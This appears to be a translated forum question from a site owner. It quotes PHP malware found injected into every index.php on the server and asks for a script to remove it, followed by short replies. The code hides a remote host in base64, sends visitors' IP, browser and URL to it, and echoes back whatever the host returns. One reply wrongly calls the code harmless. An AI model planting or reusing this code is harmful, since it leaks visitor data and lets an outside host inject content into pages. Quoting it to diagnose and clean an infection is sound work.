0
這是住在我的網站,它非常壞的惡意軟件,與谷歌機器人的惡意軟件工作
<?php
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&& (strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode('aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
$stCurlHandle = curl_init($stCurlLink);
}
}
if ($stCurlHandle !== NULL)
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
?>
這是固定在我的服務器上所有的index.php文件,現在我要清除所有指數.PHP使用ssh或遠程的CentOS的網頁,我認爲它可以用一個簡單的PHP代碼和正規表示法(也許),我需要這個腳本[對不起我弱恩朗]
感謝這麼多
你的實際問題是什麼?如何刪除該代碼段?事實上,它似乎並沒有做任何事情。它只是用用戶的IP /瀏覽器和所請求的URL來平衡'rebostat.com' - 換句話說,就像世界上的任何廣告服務器一樣。 –
您應該能夠通過使用代碼的搜索引擎來找到更多信息。聽起來就像你安裝了易受攻擊的軟件。 –
@Javid,我整理了一個解決方案,以便您可以找到與此惡意軟件相匹配的所有文件。它在這裏(問題關閉之前,我可以提交):'http:// codepad.org/nIvotncQ'希望它可以幫助 –